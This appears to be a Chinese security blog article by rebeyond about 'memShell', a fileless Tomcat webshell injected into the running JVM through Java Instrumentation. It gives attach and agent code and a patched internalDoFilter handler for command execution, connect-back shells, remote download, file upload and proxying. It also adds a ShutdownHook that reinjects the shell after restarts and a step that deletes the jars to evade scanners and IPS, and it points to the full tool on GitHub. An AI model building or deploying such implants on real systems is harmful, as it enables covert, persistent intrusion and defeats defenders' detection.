热门关键字:   网站安全  黑客攻防  安全漏洞  系统安全  网络安全

利用“进程注入”实现无文件复活 WebShell

发布时间:2018-05-31 11:03文章来源:freebuf文章作者:rebeyond 点击次数:
摘要:上周末,一个好兄弟找我说一个很重要的目标shell丢了,这个shell之前是通过一个S2代码执行的漏洞拿到的,现在漏洞还在,不过web目录全部不可写,问我有没有办法搞个webshell继续做内网。正好我之前一直有个通过“进程注入”来实现内存webshell的想法,于是就...

 

前言

一般在渗透过程中,我们通常会用到webshell,一个以文件的形式存在于Web容器内的恶意脚本文件。我们通过webshell来让Web Server来执行我们的任意指令。如果在某些机选情况下,我们不想或者不能在Web目录下面写入文件,是不是就束手无策了?当然不是,写入webshell并不是让Web Server来执行我们任意代码的唯一方式,通过直接修改进程的内存也可以实现这个目的。我们只要拥有一个web容器进程执行用户的权限,理论上就可以完全控制该进程的地址空间(更确切的说是地址空间中的非Kernel部分),包括地址空间内的数据和代码。OS层进程注入的方法有很多,不过具体到Java环境,我们不需要使用操作系统层面的进程注入方法。Java为我们提供了更方便的接口:Java Instrumentation。

Java Instrumentation简介

先看下官方概念:java Instrumentation指的是可以用独立于应用程序之外的代理(agent)程序来监测和协助运行在JVM上的应用程序。这种监测和协助包括但不限于获取JVM运行时状态,替换和修改类定义等。简单一句话概括下:Java Instrumentation可以在JVM启动后,动态修改已加载或者未加载的类,包括类的属性、方法。该机制最早于Java SE5 引入,Java SE6之后的机制相对于Java SE5有较大改进,因为现在Java SE5这种古董级别的环境已经不多,此处不再赘述。

下面看一个简单的例子:首先新建3个Java工程Example、Agent和AgentStarter。

在工程Example中新建2个类:

Bird.java: public class Bird {     public void say()     {         System.out.println("bird is gone.");     } } 

然后把编译后的Bird.class复制出来,放到D盘根目录。然后把Bird.java再改成如下:

Bird.java: public class Bird {     public void say()     {         System.out.println("bird say hello");     } } 
Main.java: public class Main {     public static void main(String[] args) throws Exception {         // TODO Auto-generated method stub         while(true)         {             Bird bird=new Bird();             bird.say();             Thread.sleep(3000);         }         } } 

把整个工程打包成可执行jar包normal.jar,放到D盘根目录。在工程Agent中新建2个类:

AgentEntry.java: public class AgentEntry {     public static void agentmain(String agentArgs, Instrumentation inst)             throws ClassNotFoundException, UnmodifiableClassException,             InterruptedException {         inst.addTransformer(new Transformer (), true);          Class[] loadedClasses = inst.getAllLoadedClasses();         for (Class c : loadedClasses) {             if (c.getName().equals("Bird")) {                 try {                     inst.retransformClasses(c);                 } catch (Exception e) {                     // TODO Auto-generated catch block                     e.printStackTrace();                 }             }         }        System.out.println("Class changed!");     }  } 
Transformer.java: public class Transformer implements ClassFileTransformer {     static byte[] mergeByteArray(byte[]... byteArray) {        int totalLength = 0;        for(int i = 0; i < byteArray.length; i ++) {            if(byteArray[i] == null) {                continue;            }            totalLength += byteArray[i].length;        }        byte[] result = new byte[totalLength];        int cur = 0;        for(int i = 0; i < byteArray.length; i++) {            if(byteArray[i] == null) {                continue;            }            System.arraycopy(byteArray[i], 0, result, cur, byteArray[i].length);            cur += byteArray[i].length;        }        return result;    }    public static byte[] getBytesFromFile(String fileName) {         try {             byte[] result=new byte[] {};            InputStream is = new FileInputStream(new File(fileName));             byte[] bytes = new byte[1024];            int num = 0;            while ((num = is.read(bytes)) != -1) {                result=mergeByteArray(result,Arrays.copyOfRange(bytes, 0, num));                   }            is.close();            return result;         } catch (Exception e) {             e.printStackTrace();            return null;        }     }     public byte[] transform(ClassLoader classLoader, String className, Class<?> c,             ProtectionDomain pd, byte[] b) throws IllegalClassFormatException {         if (!className.equals("Bird")) {             return null;         }         return getBytesFromFile("d:/Bird.class");     }  } 

新建一个mainfest文件:

MAINFEST.MF: Manifest-Version: 1.0  Agent-Class: AgentEntry Can-Retransform-Classes: true 

然后把Agent工程打包为agent.jar,放到D盘根目录。在AgentStarter工程中新建1个类:

Attach.java: public class Attach {     public static void main(String[] args) throws Exception {         VirtualMachine vm = null;         List<VirtualMachineDescriptor> listAfter = null;         List<VirtualMachineDescriptor> listBefore = null;         listBefore = VirtualMachine.list();         while (true) {             try {                 listAfter = VirtualMachine.list();                 if (listAfter.size() <= 0)                     continue;                 for (VirtualMachineDescriptor vmd : listAfter) {                     vm = VirtualMachine.attach(vmd);                     listBefore.add(vmd);                     System.out.println("i find a vm,agent.jar was injected.");                     Thread.sleep(1000);                     if (null != vm) {                         vm.loadAgent("d:/agent.jar");                         vm.detach();                     }                 }                 break;             } catch (Exception e) {                 e.printStackTrace();             }         }     } } 

把AgentStarter打包成可执行jar包run.jar,放到D盘根目录。这时候,D盘根目录列表如下:

a.png下面开启两个命令行窗口,先运行normal.jar,再运行run.jar:

ddd.png很明显我们动态改变了正在执行的normal.jar进程中Bird类的say方法体。OK,基本原理就介绍到这里,下面我们拿tomcat来实操。

确定关键类

我们想要实现这样一种效果,访问web服务器上的任意一个url,无论这个url是静态资源还是jsp文件,无论这个url是原生servlet还是某个struts action,甚至无论这个url是否真的存在,只要我们的请求传递给tomcat,tomcat就能相应我们的指令。为了达到这个目的,需要找一个特殊的类,这个类要尽可能在http请求调用栈的上方,又不能与具体的URL有耦合,而且还能接受客户端request中的数据。经过分析,发现org.apache.catalina.core.ApplicationFilterChain类的internalDoFilter方法最符合我们的要求,首先看一下internalDoFilter方法的原型:

 private void internalDoFilter(ServletRequest request, ServletResponse response)         throws IOException, ServletException {} 

该方法有ServletRequest和ServletResponse两个参数,里面封装了用户请求的request和response。另外,internalDoFilter方法是自定义filter的入口,如下图:

eee.png市面上各种流行的Java Web类框架,都是通过一个自定义filter来接管用户请求的,所以在在internalDoFilter方法中注入通用型更强。下面我们要做的就是修改internalDoFilter方法的字节码,一般用asm或者javaassist来协助修改字节码。asm执行性能高,不过易用性差,一般像RASP这种对性能要求比较高的产品会优先采用。javaassist执行性能稍差,不过是源代码级的,易用性较好,本文即用此方法。

定制internalDoFilter

internalDoFilter是memShell接收用户请求的入口,我们在方法开始处插入如下的代码段(节选):

if (pass_the_world!=null&&pass_the_world.equals("rebeyond"))             {                 if (model==null||model.equals(""))                 {                     result=Shell.help();                 }                 else if (model.equalsIgnoreCase("exec"))                 {                     String cmd=request.getParameter("cmd");                     result=Shell.execute(cmd);                 }                 else if (model.equalsIgnoreCase("connectback"))                 {                     String ip=request.getParameter("ip");                     String port=request.getParameter("port");                     result=Shell.connectBack(ip, port);                 }                 else if (model.equalsIgnoreCase("urldownload"))                 {                     String url=request.getParameter("url");                     String path=request.getParameter("path");                     result=Shell.urldownload(url, path);                 }                 else if (model.equalsIgnoreCase("list"))                 {                     String path=request.getParameter("path");                     result=Shell.list(path);                 }                 else if (model.equalsIgnoreCase("download"))                 {                     String path=request.getParameter("path");                     java.io.File f = new java.io.File(path);                     if (f.isFile()) {                         String fileName = f.getName();                         java.io.InputStream inStream = new java.io.FileInputStream(path);                         response.reset();                         response.setContentType("bin");                         response.addHeader("Content-Disposition", "attachment; filename=\"" + fileName + "\"");                         byte[] b = new byte[100];                         int len;                             while ((len = inStream.read(b)) > 0)                                 response.getOutputStream().write(b, 0, len);                             inStream.close();                             return;                     }                 }                 else if (model.equalsIgnoreCase("upload"))                 {                     String path=request.getParameter("path");                     String fileContent=request.getParameter("fileContent");                     result=Shell.upload(path, fileContent);                 }                 else if (model.equalsIgnoreCase("proxy"))                 {                     new Proxy().doProxy(request, response);                     return;                 }                 else if (model.equalsIgnoreCase("chopper"))                 {                     new Evaluate().doPost(request, response);                     return;                 }                 response.getWriter().print(result);                 return;             }         }         catch(Exception e)         {             response.getWriter().print(e.getMessage());         } 

首先判断是否有pass_the_world密码字段,如果请求中没有带pass_the_world字段,说明是正常的访问请求,直接转到正常的处理流程中去,不进入webshell流程,避免影响正常业务。如果请求中有pass_the_world字段且密码正确,再判断当前请求的model类型,分别分发到不通的处理分支中去。为了避免对internalDoFilter自身做太大的改动,我把一些比较复杂的逻辑抽象到了外部agent.jar中去实现,由于外部jar包和javax.servlet相关的类classloader不一致,外部jar包中用到了反射的方法去执行一些无法找到的类,比如ServletRquest、ServletResponse等。

最终我们生成了2个jar包,一个inject.jar(功能类似前文demo中的run.jar),用来枚举当前机器上的jvm实例并进行代码注入。一个agent.jar,包含我们自定义的常见shell类功能,agent.jar会被inject.jar注入到tomcat进程中。执行java –jar inject.jar完成进程注入动作之后,可以把这两个jar包删除,这样我们就拥有了一个memShell,完全存在于内存中的webshell,硬盘上没有任何痕迹,再也不用担心各种webshell扫描工具,IPS,页面防篡改系统,一切看上去好像很完美。但是……内存中的数据,在进程关闭后就会丢失,如果tomcat被重启,我们的webshell也会随之消失,那岂不是然并卵?当然不是。

复活技术

既然文章标题提到了我们要实现的是不死webshell,就一定要保证在tomcat服务重启后还能存活。memShell通过设置Java虚拟机的关闭钩子ShutdownHook来达到这个目的。ShutdownHook是JDK提供的一个用来在JVM关掉时清理现场的机制,这个钩子可以在如下场景中被JVM调用:

 

1.程序正常退出

 

2.使用System.exit()退出

 

3.用户使用Ctrl+C触发的中断导致的退出

 

4.用户注销或者系统关机

 

5.OutofMemory导致的退出

 

6.Kill pid命令导致的退出所以ShutdownHook可以很好的保证在tomcat关闭时,我们有机会埋下复活的种子:)如下为我们自定义的ShutdownHook代码片段:

  public static void persist() {       try {           Thread t = new Thread() {               public void run() {                   try {                       writeFiles("inject.jar",Agent.injectFileBytes);                       writeFiles("agent.jar",Agent.agentFileBytes);                       startInject();                   } catch (Exception e) {                   }               }           };           t.setName("shutdown Thread");           Runtime.getRuntime().addShutdownHook(t);       } catch (Throwable t) {       } 

 

JVM关闭前,会先调用writeFiles把inject.jar和agent.jar写到磁盘上,然后调用startInject,startInject通过Runtime.exec启动java -jar inject.jar。

 

memShell流程梳理

下面我们来梳理一下memShell的整个植入流程:

 

1.将inject.jar和agent.jar上传至目标Web Server任意目录下。

 

2.以tomcat进程启动的OS用户执行java –jar inject.jar。

 

3.inject.jar会通过一个循环遍历查找Web Server上的JVM进程,并把agent.jar注入进JVM进程中,直到注入成功后,inject.jar才会退出。

 

4.注入成功后,agent.jar执行agentmain方法,该方法主要做以下几件事情:

 

a) 遍历所有已经加载的类,查找“org.apache.catalina.core.ApplicationFilterChain”,并对该类的internalDoFilter方法进行修改。

 

 

b) 修改完之后,把磁盘上的inject.jar和agent.jar读进tomcat内存中。

 

 

c) 对memShell做初始访问。为什么要做一次初始化访问呢?因为我们下一步要从磁盘上删掉agent.jar和inject.jar,在删除之前如果没有访问过memShell的话,memShell相关的一些类就不会加载进内存,这样后续我们在访问memShell的时候就会报ClassNotFound异常。有两种方法初始化类,第一是挨个把需要的类手动加载一次,第二是模拟做一次初始化访问,memShell采用的后者。

 

 

d) 删除磁盘上的inject.jar和agent.jar。当Web Server是Linux系统的时候,正常删除文件即可。当Web Server是Windows系统的时候,由于Windows具有文件锁定机制,当一个文件被其他程序占用时,这个文件是处于锁定状态不可删除的,inject.jar正在被JVM所占用。要删除这个jar包,需要先打开该进程,遍历该进程的文件句柄,通过DuplicateHandle来巧妙的关闭文件句柄,然后再执行删除,我把这个查找句柄、关闭句柄的操作写进了一个exe中,memShell判断WebServer是Windows平台时,会先释放这个exe文件来关闭句柄,再删除agent.jar。

 

5.memShell注入完毕,正常接收请求,通过访问http://xxx/anyurl?show_the_world=password可以看到plain风格的使用说明(为什么是plain风格,因为懒)。

 

6.当JVM关闭时,会首先执行我们注册的ShutdownHook:

 

a) 把第4(b)步中我们读进内存的inject.jar和agent.jar写入JVM临时目录。

 

 

b) 执行java -jar inject.jar,此后过程便又回到上述第3步中,形成一个闭环结构。

 

到此,memShell的整个流程就介绍完毕了。

memShell用法介绍

 

1.memShell实现了常见的webshell的功能,像命令执行:

 

1.png

 

 

2.memShell通过内嵌reGeorg实现了socks5代理转发功能,方便内网渗透:

2.png这里要说明一下,因为reGeorg官方的reGeorgSocksProxy.py不支持带参数的URL,所有我们要稍微改造一下reGeorgSocksProxy.py:

 

3.png把第375行改成上图所示即可。

 

 

3.memShell内嵌了菜刀一句话:

 

4.png

 

 

4.只设置访问密码,不设置model类型可查看plain style的help:

 

x.png

 

后记

本文仅以Java+tomcat为例来介绍内存webshell的原理及实现,其他几种容器如JBOSS、WebLogic等,只是“定位关键类”那一步稍有不同,其他环节都是通用的。理论上其他几种语言同样可以实现类似的功能,我就算给大家抛砖引玉了。 

Github代码地址:https://github.com/rebeyond/memShell  

里面有很多功能还有可以改进的地方,后面有时间再慢慢完善吧。

最后,华为终端云SilverNeedle团队诚招各路安全人才(APT方向),待遇优厚,欢迎私信推荐和自荐:)

标签分类:

上一篇:如何利用Struts2漏洞绕过防火墙获取Root权限
下一篇:没有了